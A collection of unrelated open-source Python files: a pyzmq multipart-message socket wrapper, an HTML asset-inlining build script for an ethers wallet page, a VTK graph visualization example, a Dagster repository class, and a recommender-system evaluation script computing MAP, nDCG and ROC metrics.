        # signature; the one stored on the instance is what gets used.
        super(Socket, self).__init__(self.context, socket_type)

    # Override send_string to ensure copy defaults to True.
    # https://github.com/zeromq/pyzmq/pull/456
    def send_string(self, u, flags=0, copy=True, encoding='utf-8'):
        super(Socket, self).send_string(
            u, flags=flags, copy=copy, encoding=encoding)
    send_string.__doc__ = zmq.Socket.send_string.__doc__

    def recv_message(self, flags=0):
        '''Receive a message as a (topic, headers, message) tuple.

        topic is a string; headers is decoded from a JSON frame into a
        Headers object (empty when the frame is absent/empty); message is
        the (possibly empty) list of remaining frames.
        '''
        topic = self.recv_string(flags)
        # Each part is optional: only read further frames while more exist.
        headers = self.recv_string(flags) if self.rcvmore else ''
        headers = jsonapi.loads(headers) if headers else {}
        message = self.recv_multipart(flags) if self.rcvmore else []
        return topic, Headers(headers), message

    def recv_message_ex(self, flags=0):
        '''Receive a message as (content type, message) tuples.

        Like recv_message(), returns a three tuple. However, the final
        message component contains a list of 2-tuples instead of a list
        of messages. These 2-tuples contain the content-type and the
        data, pairing each frame with its 'Content-Type' header entry.
        '''
        topic, headers, message = self.recv_message(flags)
        message = zip(headers['Content-Type'], message)
        return topic, headers, message

    def send_message(self, topic, headers, *msg_parts, **kwargs):
        '''Send a multipart message with topic and headers.

        Send a multipart message on the socket with topic being a UTF-8
        string, headers can be a dictionary or a Headers object, and
        msg_parts is the optional parts of the message. The media or
        content type of each message component should be included in the
        'Content-Type' header which should be a list of MIME types or a
        string if there is only one message part.
        '''
        # Only `flags` is accepted via kwargs; anything else is an error.
        flags = kwargs.pop('flags', 0)
        if kwargs:
            raise TypeError('send_message() got unexpected keyword '
                            'arugment(s): ' + ', '.join(kwargs))
        if not isinstance(headers, Headers):
            headers = Headers(headers) if headers else Headers()
        # SNDMORE chains the frames: topic, then headers, then any parts.
        self.send_string(topic, flags | zmq.SNDMORE)
        self.send_json(headers.dict, flags | (zmq.SNDMORE if msg_parts else 0))
        if msg_parts:
            self.send_multipart(msg_parts, flags)

    def send_message_ex(self, topic, headers, *msg_tuples, **kwargs):
        '''Send messages given as (content-type, message) tuples.

        Similar to the send_message method except that messages are given
        as 2-tuples with the MIME type as the first element and the
        message data as the second element; the MIME types become the
        'Content-Type' header list.
        '''
        headers = Headers(headers) if headers else Headers()
        headers['Content-Type'], msg_parts = zip(*msg_tuples)
        self.send_message(topic, headers.dict, *msg_parts, **kwargs)
|
#!/usr/local/bin/python3
# Guard: probe for the `xrange` builtin (Python 2 only) and refuse to run
# under Python 2.
python = 3
try:
    xrange
    python = 2
except:
    pass
if python == 2:
    raise Exception("Use python3")
import base64
import codecs
import hashlib
import os
import re
import subprocess
# When True, inlined JS/CSS is minified through uglifyjs/uglifycss.
UGLIFY = True
#UGLIFY = False
# Patterns locating external assets in the HTML (group 1 = the file path).
reScript = re.compile('<script(?:[^>]+)src="([^"]*)"(?:[^>]*)>((?:.|\n)*?)</script>')
reStyle = re.compile('<link(?:[^>]+)href="([^"]*)"(?:[^>]*)/(?:[^>]*)>')
reJpg = re.compile('url\\(([^)]+.jpg)\\)')
rePng = re.compile('url\\(([^)]+.png)\\)')
reGif = re.compile('url\\(([^)]+.gif)\\)')
reWoff = re.compile('url\\(([^)]+.woff)\\)')
def inlinify_script(match):
    """Replace a <script src=...> tag with an inline <script> holding the file.

    Raises if the original tag had a non-empty body. Pre-minified files
    (name contains '.min.') are read verbatim; otherwise the file is run
    through uglifyjs when UGLIFY is on.
    """
    if match.group(2).strip() != '':
        raise Exception('script has body')
    filename = match.group(1)
    # Use the un-minified ethers build when minification is disabled.
    if filename == '/lib-client/node_modules/ethers/dist/ethers.min.js' and not UGLIFY:
        filename = '/lib-client/node_modules/ethers/dist/ethers.js'
    if '.min.' in filename:
        script = open(filename, 'rb').read().decode('utf8')
    elif UGLIFY:
        script = subprocess.check_output(['uglifyjs', filename]).decode('utf8')
    else:
        script = open(filename).read()
    # Flip the DEBUG flag off in the app entry point; the length check
    # guarantees exactly one replacement happened ('false' is 1 char longer).
    if filename == '/scripts/index.js':
        undebug = script.replace('var DEBUG = true;', 'var DEBUG = false;')
        if len(undebug) != len(script) + 1:
            raise Exception('DEBUG conversion error')
        script = undebug
    print("script", filename, len(script))
    return '<script type="text/javascript">/* ' + filename + ' */ ' + script + '</script>'
def inlinify_style(match):
    """Replace a stylesheet <link> tag with an inline <style> block.

    Raises unless the tag carries both rel="stylesheet" and
    type="text/css". Runs the CSS through uglifycss when UGLIFY is on.
    """
    tag = match.group(0)
    if tag.find('rel="stylesheet"') == -1 or tag.find('type="text/css"') == -1:
        raise Exception('not a stylesheet')
    path = match.group(1)
    if UGLIFY:
        style = subprocess.check_output(['uglifycss', path]).decode('utf8')
    else:
        style = open(path, 'rb').read().decode('utf8')
    print("style", path, len(style))
    return '<style type="text/css">/* ' + path + ' */ ' + style + '</style>'
def inlinify_png(match):
    """Inline a url(...) PNG reference as a base64 data URI."""
    path = match.group(1)
    payload = open(path, 'rb').read()
    print("png", path, len(payload))
    encoded = base64.b64encode(payload).decode('utf8')
    return 'url(data:image/png;base64,%s)' % encoded
def inlinify_jpg(match):
    """Inline a url(...) JPEG reference as a base64 data URI."""
    path = match.group(1)
    payload = open(path, 'rb').read()
    print("jpg", path, len(payload))
    encoded = base64.b64encode(payload).decode('utf8')
    return 'url(data:image/jpeg;base64,%s)' % encoded
def inlinify_gif(match):
    """Inline a url(...) GIF reference as a base64 data URI."""
    path = match.group(1)
    payload = open(path, 'rb').read()
    print("gif", path, len(payload))
    encoded = base64.b64encode(payload).decode('utf8')
    return 'url(data:image/gif;base64,%s)' % encoded
def inlinify_woff(match):
    """Inline a url(...) WOFF font reference as a base64 data URI."""
    path = match.group(1)
    payload = open(path, 'rb').read()
    print("woff", path, len(payload))
    encoded = base64.b64encode(payload).decode('utf8')
    return 'url(data:application/x-font-woff;charset=utf-8;base64,%s)' % encoded
# Read the page and inline every external asset so dist/index.html is fully
# self-contained.
html = open('index.html').read()
print("html", "index.html", len(html))
html = reScript.sub(inlinify_script, html)
html = reWoff.sub(inlinify_woff, html)
html = reStyle.sub(inlinify_style, html)
html = rePng.sub(inlinify_png, html)
html = reJpg.sub(inlinify_jpg, html)
html = reGif.sub(inlinify_gif, html)
# Compute the page hash over the content with the placeholder removed, then
# bake that hash back into the page. The length check guarantees the
# placeholder occurred exactly once.
EthersHashTag = '<ETHERS_HASH>'
stripped = html.replace(EthersHashTag, '').encode('utf8')
if len(stripped) + len(EthersHashTag) != len(html.encode('utf8')):
    raise Exception('ETHERS_HASH conversion bug')
ethersHash = hashlib.sha256(stripped).hexdigest()
data = html.replace(EthersHashTag, '0x' + ethersHash).encode('utf8')
open('./dist/index.html', 'wb').write(data)
print("hash: " + ethersHash)
print("html", "./dist/index.html", len(data))
|
<filename>IMU/VTK-6.2.0/Examples/Infovis/Python/boost_mst_with_hgv.py<gh_stars>1-10
#!/usr/bin/env python
from vtk import *
# Build a random undirected graph to drive the pipeline.
source = vtkRandomGraphSource()
source.DirectedOff()
source.SetNumberOfVertices(100)
source.SetEdgeProbability(0.1)
source.SetUseEdgeProbability(True)
source.AllowParallelEdgesOn()
source.AllowSelfLoopsOn()
source.SetStartWithTree(True)
# Connect to the centrality filter.
centrality = vtkBoostBrandesCentrality ()
centrality.SetInputConnection(source.GetOutputPort())
# Find the minimal spanning tree over the "centrality" edge weights;
# weights are negated so high-centrality edges are preferred.
mstTreeSelection = vtkBoostKruskalMinimumSpanningTree()
mstTreeSelection.SetInputConnection(centrality.GetOutputPort())
mstTreeSelection.SetEdgeWeightArrayName("centrality")
mstTreeSelection.NegateEdgeWeightsOn()
mstTreeSelection.Update()
# Take selection and extract a graph
extract_graph = vtkExtractSelectedGraph()
extract_graph.AddInputConnection(centrality.GetOutputPort())
extract_graph.SetSelectionConnection(mstTreeSelection.GetOutputPort())
# Extract a tree from the graph
extract_tree = vtkBoostBreadthFirstSearchTree()
extract_tree.AddInputConnection(extract_graph.GetOutputPort())
# Create a graph layout view with vertices/edges labeled and colored by
# the computed centrality.
view = vtkGraphLayoutView()
view.AddRepresentationFromInputConnection(centrality.GetOutputPort())
view.SetVertexLabelArrayName("centrality")
view.SetVertexLabelVisibility(True)
view.SetVertexColorArrayName("centrality")
view.SetColorVertices(True)
view.SetEdgeColorArrayName("centrality")
view.SetColorEdges(True)
view.SetLayoutStrategyToSimple2D()
# Setup a couple layout strategies so we can switch
# them out for comparison
treeStrat = vtkTreeLayoutStrategy();
treeStrat.RadialOn()
treeStrat.SetAngle(120)
treeStrat.SetLogSpacingValue(1)
forceStrat = vtkSimple2DLayoutStrategy()
forceStrat.SetEdgeWeightField("centrality")
# Create an HGV (hierarchical graph view): the BFS tree is the hierarchy,
# the full graph supplies the bundled edges.
view2 = vtkHierarchicalGraphView()
view2.SetHierarchyFromInputConnection(extract_tree.GetOutputPort())
view2.SetGraphFromInputConnection(centrality.GetOutputPort())
view2.SetVertexColorArrayName("centrality")
view2.SetColorVertices(True)
view2.SetVertexLabelArrayName("centrality")
view2.SetVertexLabelVisibility(True)
view2.SetEdgeColorArrayName("centrality")
view2.SetColorEdges(True)
view2.SetBundlingStrength(.75)
view2.SetLayoutStrategy(forceStrat)
#view2.SetLayoutStrategy(treeStrat)
# Make sure all views are using a pedigree id selection
view.GetRepresentation(0).SetSelectionType(2)
view2.GetRepresentation(0).SetSelectionType(2)
# Create a selection link and set both views to use it, so picking in one
# view highlights the same vertices in the other.
annotationLink = vtkAnnotationLink()
view.GetRepresentation(0).SetAnnotationLink(annotationLink)
view2.GetRepresentation(0).SetAnnotationLink(annotationLink)
annotationLink.SetCurrentSelection(mstTreeSelection.GetOutput())
# Make updater to update views on selection change
updater = vtkViewUpdater()
updater.AddView(view)
updater.AddView(view2)
# Set the theme on the view
theme = vtkViewTheme.CreateMellowTheme()
theme.SetLineWidth(4)
theme.SetPointSize(8)
theme.SetSelectedCellColor(1,0,1)
theme.SetSelectedPointColor(1,0,1)
view.ApplyViewTheme(theme)
theme.SetLineWidth(1)
view2.ApplyViewTheme(theme)
theme.FastDelete()
# Render both windows and hand control to the interactor.
view.GetRenderWindow().SetSize(600, 600)
view.ResetCamera()
view.Render()
view2.GetRenderWindow().SetSize(600, 600)
view2.ResetCamera()
view2.Render()
view.GetInteractor().Start()
|
<gh_stars>0
from dagster import check
from dagster.core.errors import DagsterInvalidDefinitionError, DagsterInvariantViolationError
from .pipeline import PipelineDefinition
class RepositoryDefinition(object):
    '''Define a repository that contains a collection of pipelines.

    Args:
        name (str): The name of the repository.
        pipeline_dict (Dict[str, Union[callable, PipelineDefinition]]):
            A dictionary of pipelines. Each value is either a
            PipelineDefinition or a function that takes no parameters and
            returns a PipelineDefinition.

            Callables are accepted instead of only PipelineDefinitions so
            that pipelines can be created on demand when accessed by name.

            As pipelines are retrieved it is ensured that the key in the
            dictionary and the name of the pipeline are the same.
    '''

    def __init__(self, name, pipeline_dict):
        self.name = check.str_param(name, 'name')

        check.dict_param(pipeline_dict, 'pipeline_dict', key_type=str)
        for val in pipeline_dict.values():
            check.invariant(
                callable(val) or isinstance(val, PipelineDefinition),
                (
                    'Value in pipeline_dict must be function, an @pipeline function, '
                    'or a PipelineDefinition instance '
                ),
            )

        self.pipeline_dict = pipeline_dict

        # Lazily-populated caches; see get_pipeline / get_all_pipelines /
        # get_all_solid_defs.
        self._pipeline_cache = {}
        self._all_pipelines = None
        self._solid_defs = None

    @property
    def pipeline_names(self):
        return list(self.pipeline_dict.keys())

    @staticmethod
    def eager_construction(name, pipelines, *args, **kwargs):
        '''Useful help when you are unconcerned about the the performance of
        pipeline construction. You can just pass a list of pipelines and it will
        handle constructing the dictionary of pipeline name to functions for you.
        '''
        check.list_param(pipelines, 'pipelines', of_type=PipelineDefinition)

        # avoids lint violation cell-var-from-loop and crazy loop scoping rules
        # see https://stackoverflow.com/questions/12423614/
        def lambdify(item):
            return lambda: item

        return RepositoryDefinition(
            name, {pipeline.name: lambdify(pipeline) for pipeline in pipelines}, *args, **kwargs
        )

    def has_pipeline(self, name):
        check.str_param(name, 'name')
        return name in self.pipeline_dict

    def _resolve_pipeline(self, name):
        '''Return the raw entry for `name`, materializing callables; raise a
        descriptive error listing the known pipelines when absent.'''
        check.str_param(name, 'name')
        if name not in self.pipeline_dict:
            raise DagsterInvariantViolationError(
                'Could not find pipeline "{name}". Found: {pipeline_names}.'.format(
                    name=name,
                    pipeline_names=', '.join(
                        [
                            # BUG FIX: this previously formatted with the
                            # *missing* `name`, so the error listed the
                            # missing pipeline N times instead of the ones
                            # that actually exist.
                            '"{pipeline_name}"'.format(pipeline_name=pipeline_name)
                            for pipeline_name in self.pipeline_dict.keys()
                        ]
                    ),
                )
            )

        entry = self.pipeline_dict[name]
        if isinstance(entry, PipelineDefinition):
            return entry
        elif callable(entry):
            return entry()
        else:
            check.failed('Should be pipeline or callable')

    def get_pipeline(self, name):
        '''Get a pipeline by name. Only constructs that pipeline and caches it.

        Args:
            name (str): Name of the pipeline to retrieve.

        Returns:
            PipelineDefinition: Instance of PipelineDefinition with that name.
        '''
        check.str_param(name, 'name')
        if name in self._pipeline_cache:
            return self._pipeline_cache[name]

        pipeline = self._resolve_pipeline(name)
        self._pipeline_cache[name] = check.inst(
            pipeline,
            PipelineDefinition,
            (
                'Function passed into pipeline_dict with key {key} must return a '
                'PipelineDefinition'
            ).format(key=name),
        )
        return pipeline

    def get_all_pipelines(self):
        '''Return all pipelines as a list.

        Returns:
            List[PipelineDefinition]:
        '''
        if self._all_pipelines:
            return self._all_pipelines

        self._all_pipelines = list(map(self.get_pipeline, self.pipeline_dict.keys()))
        # This does uniqueness check
        self.get_all_solid_defs()
        return self._all_pipelines

    def get_all_solid_defs(self):
        '''Return all unique solid definitions across all pipelines, as a list.'''
        # BUG FIX: the cached branch previously returned the underlying dict
        # while the first call returned a list of its values; return the
        # same shape on every call.
        if self._solid_defs is None:
            self._solid_defs = self._construct_solid_defs()
        return list(self._solid_defs.values())

    def _construct_solid_defs(self):
        solid_defs = {}
        solid_to_pipeline = {}
        # This looks like it should infinitely loop but the
        # memoization of all_pipelines and _solid_defs short
        # circuits that
        for pipeline in self.get_all_pipelines():
            for solid_def in pipeline.solid_defs:
                if solid_def.name not in solid_defs:
                    solid_defs[solid_def.name] = solid_def
                    solid_to_pipeline[solid_def.name] = pipeline.name

                # Two *distinct* definitions under the same name is an error.
                if not solid_defs[solid_def.name] is solid_def:
                    first_name, second_name = sorted(
                        [solid_to_pipeline[solid_def.name], pipeline.name]
                    )
                    raise DagsterInvalidDefinitionError(
                        (
                            'You have defined two solid definitions named "{solid_def_name}" '
                            'in repository "{repository_name}". Solid definition names must be '
                            'unique within a repository. The solid definition has been defined in '
                            'pipeline "{first_pipeline_name}" and it has been defined '
                            'again in pipeline "{second_pipeline_name}."'
                        ).format(
                            solid_def_name=solid_def.name,
                            repository_name=self.name,
                            first_pipeline_name=first_name,
                            second_pipeline_name=second_name,
                        )
                    )

        return solid_defs

    def solid_def_named(self, name):
        '''Look up a single solid definition by name; fails if absent.'''
        check.str_param(name, 'name')
        self.get_all_solid_defs()
        if name not in self._solid_defs:
            check.failed('could not find solid_def {}'.format(name))
        return self._solid_defs[name]
|
from sklearn.metrics import accuracy_score, average_precision_score, coverage_error, label_ranking_average_precision_score, pairwise, roc_curve, auc, roc_auc_score, average_precision_score,precision_recall_curve, precision_score, recall_score, f1_score, precision_recall_fscore_support, confusion_matrix, classification_report
import numpy as np
from sklearn.preprocessing import normalize
from scipy.sparse import csr_matrix
import pandas as pd
import argparse
from joblib import Parallel, delayed
import os
import tempfile
import shutil
import common
import json
import time
import matplotlib
# Select a non-interactive backend before pyplot is imported so the script
# also works on headless machines.
matplotlib.use('Agg')
matplotlib.rcParams['xtick.labelsize'] = 15
matplotlib.rcParams['ytick.labelsize'] = 15
#matplotlib.rcParams['ylabel.size'] = 20
from matplotlib import rcParams
rcParams.update({'figure.autolayout': True})
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
# Feature switches for the evaluation run.
RANDOM_SELECTION=False
PLOT_MATRIX=False
# Shared state read by the do_process* workers; presumably populated later
# in this file before the workers run — TODO confirm against the full file.
test_matrix=[]
test_matrix_imp = []
sim_matrix=[]
def load_sparse_csr(filename):
    """Rebuild a scipy CSR matrix from an .npz archive.

    The archive must contain the arrays 'data', 'indices', 'indptr' and
    'shape' (as written by the matching save routine).
    """
    archive = np.load(filename)
    return csr_matrix((archive['data'], archive['indices'], archive['indptr']),
                      shape=archive['shape'])
def apk(actual, predicted, k=10):
    """Average precision at k.

    Parameters
    ----------
    actual : list
        Elements that are to be predicted (order doesn't matter).
    predicted : list
        Predicted elements (order does matter).
    k : int, optional
        Maximum number of predicted elements considered.

    Returns
    -------
    double
        The average precision at k over the input lists (0.0 when `actual`
        is empty).
    """
    predicted = predicted[:k] if len(predicted) > k else predicted
    if not actual:
        return 0.0
    hits = 0.0
    precision_sum = 0.0
    for rank, item in enumerate(predicted):
        # Count a hit only the first time an element appears.
        if item in actual and item not in predicted[:rank]:
            hits += 1.0
            precision_sum += hits / (rank + 1.0)
    return precision_sum / min(len(actual), k)


def mapk(actual, predicted, k=10):
    """Mean average precision at k over paired lists of lists.

    Parameters
    ----------
    actual : list of lists
        Elements to be predicted, one list per query.
    predicted : list of lists
        Predicted elements, one list per query (order matters).
    k : int, optional
        Maximum number of predicted elements considered.

    Returns
    -------
    double
        The mean of apk over the paired lists.
    """
    scores = [apk(act, pred, k) for act, pred in zip(actual, predicted)]
    return np.mean(scores)
def dcg_at_k(r, k):
"""
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
k: Number of results to consider
Returns:
Discounted cumulative gain
"""
r = np.asfarray(r)[:k]
if r.size:
return np.sum(r / np.log2(np.arange(2, r.size + 2)))
return 0.
def ndcg_at_k(r, k):
    """Normalized discounted cumulative gain at k.

    :param r: relevance scores in rank order (first element is the top item)
    :param k: number of results to consider
    :return: DCG@k divided by the ideal DCG@k; 0. when the ideal DCG is zero
    """
    # Ideal ordering = relevance scores sorted descending.
    ideal = dcg_at_k(sorted(r, reverse=True), k)
    return dcg_at_k(r, k) / ideal if ideal else 0.
def precision_at_k(r, k):
    """Precision at k: fraction of the top-k entries with positive relevance.

    :param r: relevance scores in rank order (first element is the first item);
              any sequence accepted
    :param k: cutoff (denominator is always k, even if fewer scores are given)
    :return: P@k as a float
    """
    ### ALS evaluation
    # BUG FIX / generalization: the original indexed with a boolean mask
    # (rk[rk > 0]), which requires r to already be an ndarray and fails on
    # plain lists; np.asarray accepts any sequence without copying ndarrays.
    rk = np.asarray(r)[:k]
    return rk[rk > 0].shape[0] * 1.0 / k
def do_process_map(i,K,mapk):
    # Worker: compute mean precision@1..K for user column i and store it in the
    # shared output array `mapk` (note: this shadows the mapk() function above).
    # Reads the module globals sim_matrix (dense item scores) and test_matrix
    # (sparse ground truth) — both must be populated by the caller beforehand.
    sim_list = sim_matrix[:,i]
    # Item indices sorted by descending score for this user.
    rank = np.argsort(sim_list)[::-1]
    # Ground-truth relevance of the top-K ranked items, as a flat dense vector.
    pred = np.asarray(test_matrix[rank[:K],i].todense()).reshape(-1)
    p=0.0
    for k in range(1,K+1):
        p+=precision_at_k(pred,k)
    mapk[i]=p/K
def do_process(i,predicted_row,actual_row,ks,p,ndcg,adiv):
    # Worker for one prediction row: accumulates precision@k and nDCG@k into the
    # shared memmaps p/ndcg (indexed [cutoff][row]) and flags every recommended
    # column in adiv (aggregate-diversity indicator) for each cutoff in ks.
    # Column indices sorted by descending predicted score.
    rank = np.argsort(predicted_row)[::-1]
    # Ground-truth relevance of the top-ranked columns, up to the largest cutoff.
    pred = np.asarray(actual_row[rank[:ks[-1]]]).reshape(-1)
    for j,k in enumerate(ks):
        p[j][i] += precision_at_k(pred,k)
        ndcg[j][i] += ndcg_at_k(pred,k)
        adiv[j][rank[:k]] = 1
def print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None):
    """pretty print for confusion matrixes"""
    # Column width fits the longest label, with a minimum of 5 chars for values.
    columnwidth = max([len(x) for x in labels]+[5]) # 5 is value length
    empty_cell = " " * columnwidth
    # Print header
    # (Python 2 print statements with trailing commas keep the row on one line.)
    print " " + empty_cell,
    for label in labels:
        print "%{0}s".format(columnwidth) % label,
    print
    # Print rows
    for i, label1 in enumerate(labels):
        print "    %{0}s".format(columnwidth) % label1,
        for j in range(len(labels)):
            cell = "%{0}.1f".format(columnwidth) % cm[i, j]
            # Optionally blank out zeros, the diagonal, or values below a threshold.
            if hide_zeroes:
                cell = cell if float(cm[i, j]) != 0 else empty_cell
            if hide_diagonal:
                cell = cell if i != j else empty_cell
            if hide_threshold:
                cell = cell if cm[i, j] > hide_threshold else empty_cell
            print cell,
        print
def plot_confusion_matrix(cm, labels, title='Confusion matrix', cmap=plt.cm.Blues):
    """Render the confusion matrix `cm` as a colour-mapped image.

    Tick marks carry the class labels (x labels rotated 90 degrees); axis
    labels use a Times 17pt font. `title` is accepted for API compatibility
    but not drawn.
    """
    csfont = {'fontname':'Times', 'fontsize':'17'}
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.colorbar()
    positions = np.arange(len(labels))
    plt.xticks(positions, labels, rotation=90)
    plt.yticks(positions, labels)
    plt.tight_layout()
    plt.ylabel('True label', **csfont)
    plt.xlabel('Predicted label', **csfont)
def evaluate(model_id,model_settings,str_config,predictions,predictions_index,binary_classification=False,start_user=0,num_users=1000,get_roc=False,get_map=False,get_p=False,batch=False):
    """Evaluate a model's predictions against the stored ground truth.

    Depending on model_settings['evaluation'] this computes classification
    metrics (accuracy / precision / recall / F1, optional confusion matrix) or
    recommendation metrics (MAP@500, ROC-AUC / PR-AUC, P@k / nDCG@k / aggregate
    diversity). Results are appended to RESULTS_DIR/eval_results.txt, or written
    to per-model files under DATA_DIR/eval/ when batch is True.
    """
    global test_matrix
    global sim_matrix
    local_path = common.DATASETS_DIR
    # Load factors and ground truth
    if model_settings['evaluation'] in ['binary','multiclass','multilabel']:
        actual_matrix = np.load(common.DATASETS_DIR+'/y_test_%s_%s_%s.npy' % (model_settings['fact'],model_settings['dim'],model_settings['dataset']))
        # Keep only classes that occur at least once in the test set.
        good_classes = np.nonzero(actual_matrix.sum(0))[0]
        actual_matrix_roc = actual_matrix_map = actual_matrix[:,good_classes]
    else:
        # Recommendation: align the sparse test matrix rows with the prediction index.
        index_matrix = open(common.DATASETS_DIR+'/items_index_test_%s.tsv' % (model_settings['dataset'])).read().splitlines()
        index_matrix_inv = dict((item,i) for i,item in enumerate(index_matrix))
        index_good = [index_matrix_inv[item] for item in predictions_index]
        actual_matrix = load_sparse_csr(local_path+'/matrix_test_%s.npz' % model_settings['dataset'])
        # Restrict to the requested user window [start_user, start_user+num_users).
        actual_matrix_map = actual_matrix[:,start_user:min(start_user+num_users,actual_matrix.shape[1])]
        actual_matrix_roc = actual_matrix_map[index_good] # Items-Users matrix
    if model_settings['fact'] in ['pmi','als']:
        if model_settings['evaluation'] == 'recommendation':
            user_factors = np.load(local_path+'/user_factors_%s_%s_%s.npy' % (model_settings['fact'],model_settings['dim'],model_settings['dataset']))
        else:
            user_factors = np.load(local_path+'/class_factors_%s_%s_%s.npy' % (model_settings['fact'],model_settings['dim'],model_settings['dataset']))
        user_factors = user_factors[start_user:min(start_user+num_users,user_factors.shape[0])]
    # Predicted matrix
    if model_settings['fact'] == 'class':
        predicted_matrix_map = predictions
        predicted_matrix_roc = predictions[:,good_classes]
    else:
        if model_settings['fact'] == 'pmi':
            # Score = cosine similarity between item and user factors.
            predicted_matrix_roc = pairwise.cosine_similarity(np.nan_to_num(predictions),np.nan_to_num(user_factors))
            predicted_matrix_map = predicted_matrix_roc.copy()
        else:
            # ALS-style: normalized item factors dotted with user factors.
            predicted_matrix_roc = normalize(np.nan_to_num(predictions)).dot(user_factors.T) # Items-Users
            predicted_matrix_map = predicted_matrix_roc.copy().T # Users-Items
    if get_map and model_settings['evaluation'] in ['recommendation']:
        actual_matrix_map = actual_matrix_roc.T.toarray()
    if get_roc and model_settings['evaluation'] in ['recommendation']:
        # Binarize the sparse ground truth (any positive count -> 1) before ROC.
        actual_matrix_roc.data = actual_matrix_roc.data / actual_matrix_roc.data
        good_classes = np.nonzero(actual_matrix_roc.sum(axis=0))[1]
        actual_matrix_roc = actual_matrix_roc[:,good_classes].toarray()
        predicted_matrix_roc = predicted_matrix_roc[:,good_classes]
    print 'Computed prediction matrix'
    print model_id
    print model_settings['dataset']
    print model_settings['configuration']
    if 'meta-suffix' in model_settings:
        print model_settings['meta-suffix']
    if not batch:
        # Interactive run: append all metrics to a single shared results file.
        if not os.path.exists(common.RESULTS_DIR):
            os.makedirs(common.RESULTS_DIR)
        fw=open(common.RESULTS_DIR+'/eval_results.txt','a')
        fw.write(model_id+'\n')
        fw.write(model_settings['dataset']+"\n")
        fw.write(model_settings['configuration']+"\n")
        if 'meta-suffix' in model_settings:
            fw.write(model_settings['meta-suffix']+"\n")
    print model_settings['evaluation']
    if model_settings['evaluation'] in ['binary','multiclass']:
        print "entro y no deberia"
        actual_matrix_map = actual_matrix_map
        labels = open(common.DATASETS_DIR+"/genre_labels_%s.tsv" % model_settings['dataset']).read().splitlines()
        # One-hot the argmax of each prediction row and map rows to label names.
        predicted_matrix_binary = np.zeros(predicted_matrix_roc.shape)
        predicted_labels = []
        actual_labels = []
        for i in range(predicted_matrix_roc.shape[0]):
            predicted_matrix_binary[i,np.argmax(predicted_matrix_roc[i])] = 1
            predicted_labels.append(labels[np.argmax(predicted_matrix_roc[i])])
            actual_labels.append(labels[np.argmax(actual_matrix_roc[i])])
        acc = accuracy_score(actual_labels,predicted_labels)
        prec = precision_score(actual_labels,predicted_labels,average='macro',labels=labels)
        recall = recall_score(actual_labels,predicted_labels,average='macro',labels=labels)
        f1 = f1_score(actual_labels,predicted_labels,average='macro',labels=labels)
        print 'Accuracy', acc
        print "Precision %.3f\tRecall %.3f\tF1 %.3f" % (prec,recall,f1)
        print [(i,l) for i,l in enumerate(labels)]
        micro_prec = precision_score(actual_labels,predicted_labels,average='micro',labels=labels)
        print "Micro precision", micro_prec
        print classification_report(actual_labels,predicted_labels,target_names=labels)
        if PLOT_MATRIX:
            # Normalize the confusion matrix by row (i.e by the number of samples in each class)
            cm = confusion_matrix(actual_labels,predicted_labels,labels=labels)
            #print_cm(cm, labels)
            #plt.figure()
            #plot_confusion_matrix(cm, title='Not Normalized confusion matrix')
            #plt.savefig('confusion_notNormalized.png')
            #M = cm.sum(axis=1)
            #print M
            cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
            print('Normalized confusion matrix')
            #print_cm(cm, labels)
            plt.figure()
            plot_confusion_matrix(cm, labels, title='Normalized confusion matrix')
            plt.savefig('confusion_%s.png' % model_id)
    if batch:
        # Batch mode: one output directory per (model, user-count) pair.
        try:
            if not os.path.exists(common.DATA_DIR+"/eval/%s-%s/" % (model_id,num_users)):
                os.makedirs(common.DATA_DIR+"/eval/%s-%s/" % (model_id,num_users))
        except:
            pass
    # MAP@k
    if get_map:
        fname = common.DATA_DIR+"/eval/%s-%s/map_%s.txt" % (model_id,num_users,start_user)
        if not os.path.isfile(fname) or not batch:
            k = 500
            actual = [list(np.where(actual_matrix_map[i] > 0)[0]) for i in range(actual_matrix_map.shape[0])]
            predicted = list([list(l)[::-1][:k] for l in predicted_matrix_map.argsort(axis=1)])
            map500 = mapk(actual, predicted, k)
            if batch:
                fw_map = open(fname,"w")
                fw_map.write(str(map500))
                fw_map.close()
            else:
                fw.write('MAP@500: %.5f\n' % map500)
            print 'MAP@500: %.5f' % map500
    # ROC
    if get_roc:
        fname = common.DATA_DIR+"/eval/%s-%s/roc_%s.txt" % (model_id,num_users,start_user)
        #if not os.path.isfile(fname):
        roc_auc = roc_auc_score(actual_matrix_roc,predicted_matrix_roc)
        print 'ROC-AUC: %.5f' % roc_auc
        pr_auc = average_precision_score(actual_matrix_roc,predicted_matrix_roc)
        print 'PR-AUC: %.5f' % pr_auc
        if batch:
            fw_roc = open(fname,"w")
            fw_roc.write(str(roc_auc))
            fw_roc.close()
        else:
            fw.write('ROC-AUC: %.5f\n' % roc_auc)
            fw.write('PR-AUC: %.5f\n' % pr_auc)
    # P@k
    if get_p:
        ks = [1,3,5]
        # Shared memmaps let the joblib workers write results in place.
        folder = tempfile.mkdtemp()
        p = np.memmap(os.path.join(folder, 'p'), dtype='f',shape=(len(ks),predicted_matrix_map.shape[0]), mode='w+')
        adiv = np.memmap(os.path.join(folder, 'adiv'), dtype='f',shape=(len(ks),predicted_matrix_map.shape[1]), mode='w+')
        ndcg = np.memmap(os.path.join(folder, 'ndcg'), dtype='f',shape=(len(ks),predicted_matrix_map.shape[0]), mode='w+')
        Parallel(n_jobs=20)(delayed(do_process)(i,predicted_matrix_map[i,:],actual_matrix_map[i,:],ks,p,ndcg,adiv)
                            for i in range(0,predicted_matrix_map.shape[0]))
        line_p=[]
        line_n=[]
        line_a=[]
        for i,k in enumerate(ks):
            pk = p[i].mean()
            nk = ndcg[i].mean()
            # Aggregate diversity: fraction of items recommended to at least one user.
            ak = adiv[i].sum() / predicted_matrix_map.shape[1]
            print 'P@%d: %.2f' % (k, pk)
            print 'nDCG@%d: %.2f' % (k, nk)
            print 'ADiv/C@%d: %.2f' % (k, ak)
            fw.write('P@%d: %.2f\n' % (k, pk))
            fw.write('nDCG@%d: %.2f\n' % (k, nk))
            fw.write('ADiv/C@%d: %.2f\n' % (k, ak))
            line_p.append(pk)
            line_n.append(nk)
            line_a.append(ak)
        try:
            shutil.rmtree(folder)
        except:
            print("Failed to delete: " + folder)
    if not batch:
        fw.write('\n')
        fw.write(str_config)
        fw.write('\n')
        fw.close()
